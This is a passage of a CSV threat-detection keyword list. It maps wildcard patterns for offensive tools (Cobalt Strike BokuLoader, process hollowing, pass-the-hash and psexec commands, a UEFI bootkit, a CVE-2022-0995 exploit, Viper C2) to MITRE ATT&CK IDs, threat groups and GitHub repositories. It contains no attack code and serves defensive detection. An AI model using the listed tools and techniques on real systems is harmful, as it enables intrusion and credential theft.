features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_customPE*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_mask_*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_MZ_from_C2Profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_strrep*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku7/BokuLoader*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku7/HOLLOW*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" +"*BokuLoader.cna*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*BokuLoader.exe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*BokuLoader.x64*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*bolt://localhost:7687*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*Bonfee/CVE-2022-0995*","offensive_tool_keyword","POC","CVE-2022-0995 exploit","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/Bonfee/CVE-2022-0995","1","1","N/A","N/A","5","490","71","2022-03-27T09:07:01Z","2022-03-26T21:46:09Z" +"*BooExecutorImpl.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bootkit-rs.git*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*bootkit-rs-master*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*BorjaMerino*Pazuzu*","offensive_tool_keyword","Pazuzu","Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.","T1055 - T1027 - T1071 - T1059","TA0002 - TA0005 - TA0011","N/A","N/A","Exploitation tools","https://github.com/BorjaMerino/Pazuzu","1","1","N/A","N/A","3","213","70","2020-08-04T18:49:36Z","2015-10-05T12:23:17Z" +"*Bot_MSF_Exp_*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Bot_Python_Poc_Log4j2_VMwareHorizon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*bpassthehash*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bpowerpick*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bpsexec_command*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bpsexec_command*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bpsexec_psh*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bpsinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bpsinject*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 